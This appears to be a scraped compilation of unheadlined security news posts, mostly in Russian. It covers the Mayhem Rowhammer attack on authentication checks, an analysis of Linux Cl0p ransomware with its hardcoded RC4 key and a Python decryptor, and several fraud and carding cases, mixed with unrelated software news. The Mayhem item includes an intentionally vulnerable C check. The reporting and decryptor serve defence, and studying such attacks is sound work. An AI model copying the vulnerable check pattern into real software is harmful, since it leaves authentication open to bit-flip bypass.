По данным TheBlock, хакер присвоил 2400 ETH, 781 000 BNT, 407 000 SNX и 1,9 млрд xBNTa. Все токены за исключением xBNTa были проданы за 5600 ETH.
Исследователи из Вустерского политехнического института (США) представили новый тип атаки Mayhem, использующий метод искажения битов в динамической оперативной памяти Rowhammer для изменения значений переменных в стеке, применяемых в программе в качестве флагов для принятия решения об успешности аутентификации и прохождения проверок безопасности. Практические примеры применения атаки продемонстрированы для обхода аутентификации в SUDO, OpenSSH и MySQL, а также для изменения результата проверок, связанных с безопасностью, в библиотеке OpenSSL.
Атака может быть применена к приложениям, в которых при проверках используется сравнение отличий значений от нуля. Пример уязвимого кода:
int auth = 0;
... // код проверки, меняющий значение auth в случае успешной аутентификации
if(auth != 0)
return AUTH_SUCCESS;
else
return AUTH_FAILURE;Click to expand...
В контексте данного примера для успешной атаки достаточно добиться искажения любого бита в памяти, приходящейся на 32-разрядную переменную auth в стеке. При искажении любого бита в переменной значение уже не будет равно нулю и условный оператор определит успешное прохождение аутентификации. Подобные шаблоны проверки достаточно распространены в приложениях и встречаются, например, в SUDO, OpenSSH, MySQL и OpenSSL.
Атака может быть применена и на сравнения вида "if(auth == 1)", но в этом случае её проведение усложняется, так как нужно исказить не любой бит из 32, а последний бит. Метод также может использоваться для влияния на значения переменных в процессорных регистрах, так как содержимое регистров может быть на время сброшено в стек при переключении контекста, вызове функций или срабатывании обработчика сигнала. В промежуток времени, пока регистровые значения находятся в памяти, в эту память можно внести искажения и в регистр будет восстановлено изменённое значение.
Для искажения битов применяется одна из модификаций атаки класса RowHammer. Так как память DRAM представляет собой двухмерный массив ячеек, каждая из которых состоит из конденсатора и транзистора, выполнение непрерывного чтения одной и той же области памяти приводит к флуктуации напряжения и аномалиям, вызывающим небольшую потерю заряда соседних ячеек. Если интенсивность чтения большая, то соседняя ячейка может потерять достаточно большой объём заряда и очередной цикл регенерации не успеет восстановить её первоначальное состояние, что приведёт к изменению значения сохранённых в ячейке данных. Для защиты от RowHammer производители чипов добавили механизм TRR (Target Row Refresh), который блокирует искажение ячеек в частных случаях, но не защищает о всех возможных вариатов атаки.
Для защиты от атаки Mayhem рекомендуется использовать в сравнениях не оценку отличий от нуля или совпадения с единицей, а проверку совпадений, используя случайное значение затравки c ненулевыми октетами. В этом случае для выставления нужного значения переменной необходимо точно исказить существенное число битов, что нереалистично, в отличие от искажения одного бита. Пример не подверженного атаке кода:
int auth = 0xbe406d1a;
... // код проверки, выставляющий значение auth в 0x23ab8701 в случае успешной аутентификации
if(auth == 0x23ab8701)
return AUTH_SUCCESS;
else
return AUTH_FAILURE;Click to expand...
Указанный метод защиты уже [применён](https://github.com/sudo- project/sudo/commit/7873f8334c8d31031f8cfa83bd97ac6029309e4f) разработчиками sudo и вошёл в состав выпуска 1.9.15 как исправление уязвимости CVE-2023-42465. Прототип кода для совершения атаки планируют опубликовать после внесения исправлений в основные уязвимые проекты.
Злоумышленники неоднократно звонили пенсионерке и, представляясь сотрудниками банка и правоохранительных органов, сообщали заведомо ложную информацию о попытке неизвестных лиц по доверенности получить доступ к ее сбережениям.
️Введенная в заблуждение пострадавшая поверила аферистам и начала выполнять все их указания.
Злоумышленники подослали к женщине соучастницу, которая выдавала себя за сотрудницу правоохранительного органа и ездила с пенсионеркой по отделениям банков, где последняя снимала со счетов свои накопления и передавала незнакомке.
При этом аферисты запретили пенсионерке сообщать о проводимых «мероприятиях», а «соучастницу-курьера» в банке просили называть крестницей.
Установление лиц, причастных к совершению преступления, на контроле в
Преображенской межрайонной прокуратуре.
93-летняя жительница района Гольяново отдала мошенникам более 10,7 млн рублей.
В США вынесли приговор 30-летнему Дэйви Хайнсу (Davey Hines), который был главарем группы кардеров, кравших кредитные карты американцев при их пересылке почтой. Как пишет Chicago Tribune, решением суда штата Иллинойс он приговорен к девяти годам реального тюремного заключения и трем годам условного.
Судебные слушания продолжались больше двух лет, с февраля 2021 года, что объясняется масштабностью совершенного мошенничества. Следствие выяснило, что Хайнс в течение 19 месяцев украл 657 кредитных карт, с помощью которых он совершил покупки на 462 тысячи долларов. При этом его сообщниками были сотрудники почты, которые передавали кардеру не только сами карты, но и персональные данные их владельцев. Благодаря этому Хайнс активировал пластик, не забывая вознаграждать своих подельников.
Первоначально мошеннику предъявили обвинения по 10 пунктам, однако в итоге удалось доказать лишь четыре из них: заговор, получение украденной почты, мошенничество с устройствами доступа и оно же, но при отягчающих обстоятельствах. Стоит отметить, что работу группы Хайнс сумел наладить, находясь на испытательном сроке после условно-досрочного освобождения. В 2015 году он вышел из тюрьмы, отсидев срок за банковское мошенничество.
source: chicagotribune.com/suburbs/ct-nvs-naperville-man-prison-mail-theft- credit-cards-st-0407-20230405-g3dsa5wuk5exxj6rbbcqkbtalq-story.html
The ELF Cl0p variant is developed in a similar logic to the Windows variant, though it contains small differences mostly attributed to OS differences such as API calls. It appears to be in its initial development phases as some functionalities present in the Windows versions do not currently exist in this new Linux version.
A reason for this could be that the threat actor has not needed to dedicate time and resources to improve obfuscation or evasiveness due to the fact that it is currently undetected by all 64 security engines on VirusTotal . SentinelOne Singularity detects Cl0p ransomware on both Linux and Windows devices.

Initially, the ransomware creates a new process by calling fork and exits the parent-process. The child-process sets its file mode creation mask to any permission (read, write, execute) by calling umask(0) . It then calls setsid , creates a session and sets the process group ID. It tries to access root by changing the working directory to “/” ( [chdir(“/”)](https://man7.org/linux/man- pages/man2/chdir.2.html) ). Once the permissions are set, the ransomware proceeds encrypting other directories.
While the Windows versions contain a hashing algorithm in order to avoid encrypting specific folders and files, such functionality was not observed in the Linux variant. The ELF variant targets specific folders, subfolders and all files/types.
The discovered ELF sample targets files contained in the following directories for encryption, though we do not exclude the possibility of future versions including more directories.
Folder| Description
---|---
/opt| Contains subdirectories for optional software packages
/u01| Oracle Directory, mount point used for the Oracle software only.
/u02| Oracle Directory, used for the database files.
/u03| Oracle Directory, used for the database files.
/u04| Oracle Directory, used for the database files.
/home| Contains the home directory of each user.
/root| Contains the home directory of the root user.
Windows versions of Cl0p ransomware use a Mersenne Twister PRNG (MT19937) to generate a 0x75 bytes size RC4 key for each file. This key is then validated (checks if the first five bytes are NULL) and used for file encryption. Then, by using the RSA public key, it encrypts the generated RC4 key and stores it to $filename.$clop_extension. Victims who pay the ransom demand receive a decryptor which decrypts the generated Cl0p file using the RSA private key, retrieves the generated RC4 key, and then decrypts the encrypted file.
This core functionality is missing in the Linux variant. Instead, we discovered a flawed ransomware-encryption logic which makes it possible to retrieve the original files without paying for a decryptor.
The Linux variant contains a hardcoded RC4 “master-key” which, during the execution of the main function, is copied into the global variable szKeyKey.
Sample’s RC4 “master-key”:
Jfkdskfku2ir32y7432uroduw8y7318i9018urewfdsZ2Oaifwuieh~~cudsffdsd
During the file encryption phase, the ransomware – similar to the Windows version – generates a 0x75 bytes size RC4 key, with the use of a lookup table and a PRNG byte. This generated RC4 key is used to encrypt the mappedAddress and write it back to the file.
Then by using the RC4 “master-key” the ransomware encrypts the generated RC4 key and stores it to $filename.$clop_extension. By using a symmetric algorithm (second RC4) to “encrypt” the file’s RC4 key, we were able to take advantage of this flaw and decrypt Cl0p-ELF encrypted files.
Cl0p-ELF
encryption flaw
Cl0p-ELF Decryption Logic:

The 0x75 bytes size PRNG RC4 key is encrypted with RC4 using the RC4 “master-key”. The encrypted RC4 output is 0x75 bytes size, though writes 0x100 bytes into the created Cl0p key $filename.$clop_extension. This results in writing memory data to the file and more specifically stack variables.
Cl0p-ELF
file-key creation flaw.
This flaw provides some information regarding the file before encryption. This
includes:
struct clopelfkeyfile {
byte encr_rc4key[117]; // encrypted RC4 PRNG key, size 0x75 bytes
stat fdstat; // stat(fd, &fdstat), size 0x58 bytes
long fdid; // file node unique id, size 0x8 bytes
int fd; // file descriptor, size 0x4 bytes
int fdmappedaddr; // file mapped address, size 0x4 bytes
off_t fdsize; // file size, size 0x8 bytes
int rc4_msize; // RC4 "master-key" size, size 0x4 bytes
long rc4_fsize; // RC4 PRNG key size, size 0x8 bytes
int fdnameaddr; // filename string address, size 0x4 bytes
intframeaddr; // frame pointer address, size 0x4 bytes
int retadd; // function return address, size 0x4 bytes
byte fdpathaddr[3]; // part of filepath strings address, size 0x3 bytes
}
In ELF binaries the .symtab, Symbol Table Section , holds information needed to locate and relocate a program's symbolic definitions and references, allowing us to retrieve function and global variable names.
function name| Description
---|---
do_heartbeat(void)| Main function which starts the encryption of various
folders.
find(char*,char const*)| Multiple calls of this function are done by
do_heartbeat; this function takes as parameter 1) the starting folder to
encrypt (example, “/opt”) 2) regex of files to encrypt (example, “.”) and
performs a recursive search from the starting folder until encrypts the
“matching regex files.
CreateRadMe(char )| This function takes as parameter the folder to create the
ransom note.
EncrFile(char)| Encrypts given filepath.
existsFile(char*)| Checks if File exists, or if the process has the
permissions to open.
_rc4Full(void const*,ushort,void *,ulong)| Wrapper function to _rc4Init and
_rc4, which is used to encrypt a buffer with a given key.
Createkey(char *,uchar *)| Creates and writes into "%s.C_I_0P" the encrypted
buffer.
Global Variable| Description
---|---
szKeyKey| Global variable of 0x64 bytes size, initialized during main
function, containing RC4 “master-key” which encrypts the “randomly” generated
0x75 bytes size RC4 key.
Rather than simply port the Windows version of Cl0p directly, the authors have chosen to build bespoke Linux payloads. We understand this to be the primary reason for the lack of feature parity between the new Linux version and the far more established Windows variant.
SentinelLabs expects future versions of the Linux variant to start eliminating those differences and for each updated functionality to be applied in both variants simultaneously.
Some of the differences worth highlighting are detailed below:
Differences| Description
---|---
Files/Folders exclusions| The Windows variant contains a hashing algorithm
which excludes specific folders and files from encryption. This functionality
was not observed in the Linux variant.
extension exclusions| The Windows variant contains a hardcoded list of
extensions to exclude from encryption. This functionality was not observed in
the Linux variant.
Different methods of Reading/Writing depending on file size.| The Windows
variant, depending on the size of the file, will choose different methods of
reading a file and writing the encrypted buffer. Small files are ignored,
medium-sized files will make use of [ReadFile](https://learn.microsoft.com/en-
us/windows/win32/api/fileapi/nf-fileapi-readfile) /
[WriteFile](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-
fileapi-writefile) , large files will use
[CreateFileMappingW](https://learn.microsoft.com/en-
us/windows/win32/api/memoryapi/nf-memoryapi-createfilemappingw) /
[MapViewOfFile](https://learn.microsoft.com/en-
us/windows/win32/api/memoryapi/nf-memoryapi-mapviewoffile) /
[UnmapViewOfFile](https://learn.microsoft.com/en-
us/windows/win32/api/memoryapi/nf-memoryapi-unmapviewoffile) . The Linux
variant encrypts all the files using
mmap64 /
munmap . Both only variants encrypt the
first 0x5f5e100 bytes of large files.
ransom note decryption| The Windows variant stores the encrypted ransom note
as a resource and decrypts it with a simple XOR algorithm. The Linux variant
stores the note as plain text in “.rodata”.
drive enumeration| The Windows variant initially enumerates through drives in
order to “find” the starting point to recursively encrypt the folders. The
Linux variant contains hardcoded “starting” folders.
RC4 Default Key| Once the Windows variant generates a 0x75 size PRNG RC4 Key,
it will check if the first 5 bytes are NULL; if so, it uses the default key
for encryption. The Linux version does not perform this validation and does
not contain a default RC4 key in case the first 5 bytes of the PRNG RC4 are
NULL.
Command Line Parameters| The Windows variant can be executed in three ways: 1)
without parameters encrypting all local and network drives, 2) with “runrun”
parameter encrypting only network drives, 3) with a file as parameter which
contains the folders to be encrypted (observed temp .ocx/temp.dat). The Linux
variant does not accept command line parameters and recursively encrypts the
specified hardcoded folders.
RC4 Key Encryption| The Windows variant encrypts the generated RC4 key
responsible for the file encryption using the asymmetric algorithm RSA and a
public key. In the Linux variant, the generated RC4 key is encrypted with a
RC4 “master-key” (flawed logic).
The Linux variant of Clop ransomware drops a ransom note on victim machines with a .txt format.
ELF
sample ransom note, "README_C_I_0P.TXT".
This differs somewhat from the Windows .rtf ransom note, although both use the
email addresses unlock@support-mult[.]com and unlock@rsv-box[.]com as ways for
victims to contact the attackers.
Window samples ransom note, “!_READ_ME.RTF”.
Source:[https://www.sentinelone.com/labs/cl...s-with-flawed-encryption- decryptor-available/](https://www.sentinelone.com/labs/cl0p-ransomware- targets-linux-systems-with-flawed-encryption-decryptor-available/)
Decryptor (source:https://gist.github.com/Tera0017S1/c62a928a911442e1509d127fdcd93b71):
Python:Copy to clipboard
"""
Author: @Tera0017/@SentinelOne
Description: Clop-Linux ransomware variant files decryption.
Link: https://s1.ai/Clop-ELF
Execution help: $ python3 clop_linux_file_decr.py --help
"""
import argparse
import glob
import os.path
import struct
from arc4 import ARC4
def parse_arguments() -> argparse.Namespace:
"""
Parses commandline parameters if any.
@return: returns parse_args() result -> argparse.Namespace
"""
description = """Python3 script which decrypts files encrypted by flawed Cl0p ELF variant.
More info regarding Cl0p ELF variant and how decryptor was created at https://s1.ai/Clop-ELF
"""
print('=' * 40)
print('SentinelOne Cl0p ELF variant Decryptor.\nAuthor: @Tera0017/@SentinelOne\nLink: https://s1.ai/Clop-ELF')
print('=' * 40)
parser = argparse.ArgumentParser(
prog='clop_linux_file_decr.py',
description=description,
epilog='author:@Tera0017/@SentinelOne')
parser.add_argument('--elfile', default=None, help='ELF Cl0p Binary, is used to retrieve "RC4 master key" else default is used for decryption.')
parser.add_argument('--keys', default=None, help='File containing result of "$ find / -name *.$cl0p_extension -print 2>/dev/null > cl0p_keys.txt". Run with sudo if needed .')
parser.add_argument('--rc4key', default=None, help='RC4 master key for decryption of clop key files. If --elf is provided script will dynamically retrieve it.')
return parser.parse_args()
def message(msg: str) -> None:
"""
@param msg: message to print
@return: None
"""
print(f'*{msg}')
class ClopELFDecryptor:
def __init__(self, filepath=None, clop_find_file=None, rc4_master_key=None):
"""
@param filepath: str, filepath of cl0p elf variant ransomware found in encrypted machine.
@param clop_find_file: str, filepath containing result of "$ find / -name *.$cl0p_extension -print 2>/dev/null > clop_keys.txt"
@param rc4_master_key: str, rc4 master key is not extracted well from cl0p elf binary.
"""
# if elf sample does not exist tries with observed key.
self.elfdata = open(filepath, 'rb').read() if filepath is not None else None
# result of "$ find / -name *.$cl0p_extension -print 2>/dev/null > clop_keys.txt" containing clop keys
self.clop_keys_file = clop_find_file
self.rc4_master_key = rc4_master_key
# clop filekeys extension.
self.clop_ext = ".C_I_0P"
# RC4 generated key size.
self.rc4_gen_key_size = 0x75
def get_rc4_master_key(self) -> bytes:
"""
Retrieves RC4 master key from ELF binary. If elf is not found returns default observed key.
@return: bytes, RC4 master key.
"""
if self.rc4_master_key is not None:
message('User provided RC4 master key')
return self.rc4_master_key
elif self.elfdata is None:
message('Retrieved previous observed RC4 key.')
# observed RC4 master key
return b'Jfkdskfku2ir32y7432uroduw8y7318i9018urewfdsZ2Oaifwueh~~cudsffdsd'
# dirty way to retrieve master key.
f = b'/root'
idx = self.elfdata.find(f) + len(f) + 1
return self.elfdata[idx: idx + 100].lstrip(b'\x00').split(b'\x00')[0]
def get_clop_keys(self) -> list:
"""
Based on the filekeys clop extension retrieves all the encrypted files from the machine.
* If you need to speed up process add specific folders where encryption took place.
* Or pass result of "$ find / -name *.$cl0p_extension -print 2>/dev/null > clop_keys.txt"
as argument to "--keys".
@return: list, encrypted filepaths
"""
if self.clop_keys_file is not None:
# get clop keys "$ find / -name *.$cl0p_extension -print 2>/dev/null > clop_keys.txt"
with open(self.clop_keys_file, 'r') as hfile:
lines = hfile.readlines()
return [l.strip() for l in lines if l.strip()]
# enumerate all folders and find clop extension files.
message(f'Searching for encrypted file extension {self.clop_ext}.')
message('This operation will take several minutes...')
message('To speed up process prefer to use "--keys", parameter.')
return glob.glob(f'/**/*{self.clop_ext}', recursive=True)
def decrypt(self) -> None:
"""
Main function decrypts Clop-ELF encrypted files.
@return: None
"""
message('Starting decryption process.')
# 1. Retrieve RC4 "master-key".
rc4_master_key = self.get_rc4_master_key()
message(f'RC4 Master Key: "{rc4_master_key}"')
# 2. Read all $filename.$clop_extension.
file_keys = self.get_clop_keys()
message(f'Encrypted Files: {len(file_keys)}')
for file_key in file_keys:
message(f'File: {file_key}')
with open(file_key, 'rb') as hfile:
file_key_data = hfile.read()
# 3. Decrypt with RC4 using the RC4 "master-key", the generated RC4 key.
cipher = ARC4(rc4_master_key)
file_rc4_key = cipher.decrypt(file_key_data)[:self.rc4_gen_key_size]
# getting encrypted file size (if file is written again after encryption then
# encrypted_file_size != file_size
size_off = 0x75 + 0x58 + 0x8 + 0x4 + 0x4
try:
encr_file_size = struct.unpack('Q', file_key_data[size_off: size_off + 0x8])[0]
except struct.error:
message(f'[ERROR] Clop key file seems corrupted: {file_key}')
continue
encr_file = file_key.replace(self.clop_ext, '')
# decrypted files have extension '.decrypted_by_S1', once validated can delete and replace encrypted.
decr_file = file_key.replace(self.clop_ext, '.decrypted_by_S1')
if os.path.isfile(encr_file):
with open(encr_file, 'rb') as hfile:
encr_file_data = hfile.read()
else:
message(f'[ERROR] Unable to find encrypted file: {encr_file}')
continue
# 4. Decrypt $filename with RC4 using the generated RC4 key.
cipher = ARC4(file_rc4_key)
decrypted_file_data = cipher.decrypt(encr_file_data[:encr_file_size]) + encr_file_data[encr_file_size:]
# 5. Write decrypted to $filename.
with open(decr_file, 'wb') as hfile:
hfile.write(decrypted_file_data)
message(f'Decrypted: {decr_file}')
if __name__ == '__main__':
# parsing command line arguments for the decryptor. Use --help for more information
parsed = parse_arguments()
ClopELFDecryptor(parsed.elfile, parsed.keys, parsed.rc4key).decrypt()
Закупив 4000 кредитных карт, мошенники покупали множество товаров по всей территории США.
31-летнему жителю Бронкса (Нью-Йорк, США) Тревору Осаги грозит до 30 лет лишения свободы по делу о банковском мошенничестве. Тревор был организатором общенациональной мошеннической схемы с тысячами украденных банковских счетов.
Согласно заявлению Министерства юстиции США, у Осаги была сеть партнеров, которые путешествовали по США и в разных местах покупали подарочные карты, авиабилеты, отели, арендовали автомобили и т.д.
Группа использовала украденные данные кредитных карт из даркнета, которые продаются там очень дёшево, а также из других источников. Согласно судебным документам, мошенники совершили покупки на сумму $1,5 млн. и использовали данные более 4000 украденных кредитных карт.
Недавно полиция уничтожила крупную сеть мошеннических колл-центров, которые работали в Германии, Сербии, Болгарии и Кипре. По подсчётам, общие потери граждан могут составлять сотни миллионов долларов.
source: justice[.]gov/usao-nj/pr/bronx-man-admits-role-nationwide-credit-card- fraud-affecting-thousands-account-holders
Злоумышленники не перевели средства, прежде чем вызвать функцию самоуничтожения смарт-контракта.
Хакеры, ответственные за недавний взлом проекта DeFi Zeed, похоже, забыли забрать украденные средства после атаки.
Протокол кредитования DeFi Zeed был атакован киберпреступниками, которым удалось похитить средства, воспользовавшись уязвимостью в коде. Взлом привел к тому, что цена криптовалюты YEED упала до нуля, а хакер получил прибыль в размере $1 млн.
Специалисты компании по блокчейн-безопасности PeckShield сообщили , что злоумышленники не перевели средства после атаки, прежде чем вызвать функцию «самоуничтожения» скомпрометированного смарт-контракта. Таким образом, украденная криптовалюта навсегда и необратимо пропала.
Взломы DeFi-протоколов — далеко не новое явление в криптопространстве. Ранее протокол Beanstalk, ориентированной на кредитование стабильной монеты, построенный на Ethereum, был взломан . Протокол потерял около $182 млн в различных криптоактивах. Злоумышленники украли более $80 млн в криптовалютах, в том числе 24 830 ETH (около $75 млн).
source: twitter.com/PeckShieldAlert/status/1517062566232879105
ИБ-компания Cybereason обнаружила новый троян удаленного доступа (RAT) StrifeWater, который связан с хакерами из кибершпионской группы Moses Staff. В системах жертв малварь маскируется под калькулятор Windows.
Напомню, что о группировке Moses Staff впервые сообщили исследователи компании Check Point в 2021 году. Тогда группировка атаковала израильские организации, взламывала их сети, шифровала данные, а затем отказывалась вести переговоры о выплате выкупа. Тогда ИБ-исследователи писали, что это были политически мотивированные и нарочно деструктивные атаки. На сегодняшний день жертвами хакеров стали многие компании за пределами Израиля, в том числе из Италии, Индии, Германии, Чили, Турции, ОАЭ и США.
Как теперь рассказывают аналитики Cybereason, StrifeWater, по-видимому, используется злоумышленниками на начальном этапе атак, к тому же RAT может удалиться из системы, чтобы замести следы. Помимо этого вредонос обладает и другими возможностями, включая выполнение заданных команд, захват экрана и загрузку дополнительных расширений.
В системе жертв RAT разворачивается под именем calc.exe (файл калькулятора Windows) и используется на ранних стадиях цепочки заражения, удаляясь перед развертыванием шифровальщика. Исследователи полагают, что удаление и последующая замена вредоносного исполняемого файла калькулятора обычным — это попытка замести следы и стереть доказательства существования трояна. Также, похоже, это помогает преступникам избежать обнаружения вплоть до заключительной фазы атаки.
В целом StrifeWater почти ничем не отличается от своих «одноклассников» и обладает многочисленными функциями, главными из которых являются: возможность собирать данные о системных файлах, выполнять команды, делать скриншоты, обеспечивать постоянное присутствие в системе, а также загружать обновления и вспомогательные модули.
«Конечная цель Moses Staff скорее политическая, чем финансовая, — пишут исследователи. — Хакеры используют программы-вымогатели после хищения данных, но не ради получения финансовой выгоды, а ради нанесения ущерба, сокрытия шпионской деятельности и нанесения вреда определенным системам для геополитической выгоды Ирана».
• Source: [https://www.cybereason.com/blog/str...taff-adds-new-trojan-to- ransomware-operations](https://www.cybereason.com/blog/strifewater-rat- iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations)
Польский программист Петр Фусик (Piotr Fusik) создал новый язык программирования Ć, своего рода универсальный язык написания кода. Со слов автора, его творение позволяет писать код, который в дальнейшем можно будет без труда использовать в других языках.
В качестве примера Фусик привел C, C++, C#, Java, JavaScript, Python, Swift и OpenCL. Все детали своего языка Ć, который пока находится на одном из этапов разработки, он опубликовал в открытом виде на GitHub.
Петр Фусик не уточнил, почему назвал свое творение именно так, и не сообщил, как правильно его произносить. «Апостроф» над буквой С называется «акут», то есть, с учетом этого, название языка может звучать как «Си с акутом». Также это буква польского алфавита, которая называется «Че» и читается приблизительно как «Ч».
Универсальность языка
Своей универсальностью язык Ć обязан транслятору cito. Обработанный с его помощью код можно читать на любом их перечисленных Фусиком языках программировании.
«В отличие от большинства языков, которые вы изучали раньше, Ć не претендует на звание лучшего универсального языка программирования. Вместо этого он решает одну конкретную проблему: как писать код, который можно удобно использовать одновременно на языках C, C++, C #, Java, JavaScript, Python, Swift и OpenCL. Например, если вы изобрели новый формат сжатия, вы можете реализовать его в Ć и заставить автоматический переводчик cito сгенерировать исходный код на упомянутых языках, чтобы программисты этих языков могли использовать ваш код», – описывает свое творение Петр Фусик.
Петр Фусик не уточняет, как долго он работал над Ć, и кто, помимо него, входит в команду разработчиков. Известно лишь, что создание языка длится как минимум с лета 2013 г. – этим днем датирована публикация на YouTube записи ранней презентации языка.
Сходство с другими языками
По утверждению создателя, синтаксис Ć во многом напоминает C#.
Фусик создал Ć объектно-ориентированным. Он объяснил свой выбор тем, что большинство целевых языков объектно-ориентированы.
Пример кода на Ć
Фусик утверждает, что подсветка синтаксиса C# вполне подходит и для его творения. При этом, с его слов, Ć нельзя считать ни клоном C#, ни его подмножеством. Различия между ними все же есть, и продиктованы они, по словам Фусика, «необходимостью полностью автоматической трансляции кода на Ć в эффективный код C и JavaScript».
Библиотеки не нужны
В описании к Ć сказано, что в его случае зависимости от библиотек рантайма (runtime libraries) сведены к минимуму. В качестве примера Фусик привел вывод кода, для использования в программах на С – в большинстве случаев пользователь получает автономную пару файлов .c/.h с удобочитаемым кодом С99.
Автор утверждает, то это в равной степени относится и к другим поддерживаемым языкам – C++, C#, Java, JavaScript, Python, Swift и OpenCL. В то же время он упоминает о нескольких исключениях. Одно из них касается необходимости использования библиотеки GLib для вывода кода на C в случае, когда программист, пишущий на Ć, использует выражения List, Dictionary или SortedDictionary.
Реакция сообщества
Релиз языка Ć активно обсуждается как на профильных сайтах, посвященных программированию, так и на ресурсах, никак не связанных с ним. Редакция CNews обнаружила посвященные ему темы на YCombinanor и на Reddit.
Топик на YCombinanor был создан 9 октября 2021 г. и за это время собрал почти 300 комментариев. На Reddit существует как минимум две темы для обсуждения Ć, датированных тем же днем. В одной из них набралось около 290 ответов, в другой – 33.
Пользователи разделились на два лагеря – одни считают, что язык имеет право на существование, другие же сомневаются в его практической пользе. К примеру, пользователь Reddit под псевдонимом bladehaze написал, что Ć пригодится лишь в том случае, если писать код без использования библиотек, что не всегда представляется возможным.
Издание Bleeping Computer обратило внимание на интересный проект Winamp Community Update Project (WACUP), которым занимается бывший разработчик Winamp Даррен Оуэн (Darren Owen).
В 2018 году представители бельгийской компании Radionomy Group, которой с 2014 года принадлежит легендарный медиаплеер, обещали, что совсем скоро выпустят Winamp 6 и это будет нечто совсем новое. Ожидалось, что обновленный медиаплеер сможет объединить в одном месте аудио из самых разных источников, а также важную роль в его работе будет играть существенно улучшенная поисковая функциональность, и пользователям больше не придется переключаться из одного плеера в другой. Речь даже шла об интеграции с Apple Music, Spotify, Google Music и другими аудиоплатформами.
К сожалению, эти планы так и не были претворены в жизнь, и последней версией Winamp по-прежнему остается Winamp 5.8, датированная 2018 годом. Но Даррен Оуэн решил это исправить и положился на тот факт, что система плагинов Winamp, позволяет сторонним разработчикам расширять и изменять функциональность программы. Таким образом WACUP исправляет известные ошибки в последней версии оригинального Winamp (5.66) и добавляет новые функции для использования современных операционных систем и сервисов.
Фактически при установке WACUP устанавливается исправленная версия WinAMP 5.66, а также полезные плагины проекта.
В начале текущей недели был выпущен WACUP Preview 1.0.20.7170. В этой версии исправлено огромное количество ошибок, а также появились новые функции, в числе которых улучшенная интеграция с Windows 10, новые опции воспроизведения и улучшенная совместимость со стриминговыми плагинами.
Источник: xakep.ru/2021/02/24/wacup/
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с коллегами из Ростова-на-Дону пресекли деятельность группировки, которая специализировалась на хищении денежных средств с банковских счетов граждан.
«Оперативники установили, что злоумышленники создавали фишинговые ссылки на популярных ресурсах логистических компаний и маркетплейсов. На различных интернет-площадках они размещали объявления о продаже товаров. Покупатели переходили по этим ссылкам, а при оплате вносили данные банковских карт, тем самым открывая доступ к своим счетам.
В Великом Новгороде и в городе Енакиево (Донецкая Народная Республика) оперативники задержали двоих участников криминальной схемы. Один из них – программист, который непосредственно создавал ссылки и администрировал чат. Другой с помощью мобильных телефонов и сим-карт производил регистрацию аккаунтов и совершал звонки гражданам. В ходе обыска у него изъято более трех тысяч сим-карт», – сообщила официальный представитель МВД России Ирина Волк.
Следователем ГСУ ГУ МВД России по Ростовской области возбуждено уголовное дело по признакам преступления, предусмотренного пунктом «г» части третьей статьи 158 УК РФ. В отношении одного из задержанных избрана мера пресечения в виде заключения под стражу. Его сообщник находится под подпиской о невыезде и надлежащем поведении.
«В настоящее время проводятся оперативно-розыскные мероприятия и следственные действия, направленные на установление всех обстоятельств произошедшего и возможных соучастников», – добавила Ирина Волк.
• Video: https://rutube.ru/video/9a8501b0f960380bd6ae7292009dad03/?r=plemwd
Злоумышленники звонили гражданам и, представляясь сотрудниками службы безопасности банка, сообщали о подозрительных операциях с их банковскими счетами. Таким образом они получали доступ к личным кабинетам онлайн банкинга пострадавших.
Мошенническую деятельность разоблачили сотрудники управления противодействия киберпреступлениям совместно со следователями следственного управления ГУНП в Харьковской области и УСБУ в Харьковской области, при содействии службы безопасности ПриватБанка.
Правонарушители совершали звонки от имени работников службы безопасности банка и, под предлогом недопущения проведения несанкционированных банковских операций, узнавали необходимую конфиденциальную информацию и получали доступ к управлению счетами. В дальнейшем, используя гаджеты с функцией NFC для бесконтактной оплаты они обналичивали средства в магазинах бытовой техники и банкоматах.
Правоохранители задокументировали деятельность 11 фигурантов. Проведены обыски по местам их проживания на территории Харьковской и Киевской областей. Изъяты компьютерная техника, мобильные телефоны, 27 банковских карт, 100 сим-карт и более 90 стартовых пакетов мобильных операторов, а также 100 устройств для генерации сим-карт и денежные средства.
Сейчас четырем фигурантам сообщено о подозрении по ч. 4 ст. 190 (мошенничество) Уголовного кодекса Украины. Трем подозреваемым избрана мера пресечения в виде содержания под стражей, еще одному - в виде круглосуточного домашнего ареста. По санкции статьи им грозит до 8 лет лишения свободы.
Полиция Китая в ходе масштабной операции арестовала 63 человека по делу об отмывании 12 млрд юаней ($1,7 млрд) с помощью стейблкоина USDT от Tether.
Группировка действовала с мая 2021 года, средства поступали от организаторов финансовых пирамид, мошеннических схем и азартных игр.
Под внимание правоохранителей она попала в июле 2022 года из-за аномального оборота по банковской карте ее организатора. В месяц он достигал 10 млн юаней, потенциально свидетельствуя о незаконной финансовой деятельности.
Специально созданная следственная группа раскрыла структуру преступной организации и методы работы.
Группировка принимала заказы через пункты, разбросанные по всей стране. Затем незаконные средства конвертировались в стейблкоин USDT на блокчейнах Tron (TRC-20) и Ethereum (ERC-20). Потом нанятые через соцсети люди по всему миру через анонимные криптовалютные аккаунты за комиссионное вознаграждение помогали в отмывании денег.
Для проведения задержаний и обысков задействовали более 200 полицейских, которых отправили в 17 провинций. В ходе следственных мероприятий власти конфисковали незаконно полученные доходы на сумму около 130 млн юаней.
Расследование продолжается.
source: mp.weixin.qq.com/s/JO3lpwKXj66ef0wf9qo3vw
В последнее время регулярно с помощью поддельных страниц известной электронной торговой площадки похищаются денежные средства граждан, но раскрыть подобные преступления зачастую непросто. Однако правоохранителям центрального региона страны удалось установить и задержать двух злоумышленников, промышлявших фишингом. Недавно управлением Следственного комитета по Минской области завершено расследование уголовного дела о крупном киберпреступлении.
По данным следствия, два брата в возрасте 19 и 26 лет на протяжении июня-июля 2020 года с использованием мобильных телефонов и ноутбуков находили пользователей популярной электронной торговой площадки. Молодые люди предлагали приобрести товары у потерпевших, указанные в объявлениях. При этом вместе с обвиняемыми действовали и посредники, неизвестные им наемные лица, так называемые «воркеры», которых находили посредством Telegram-каналов.
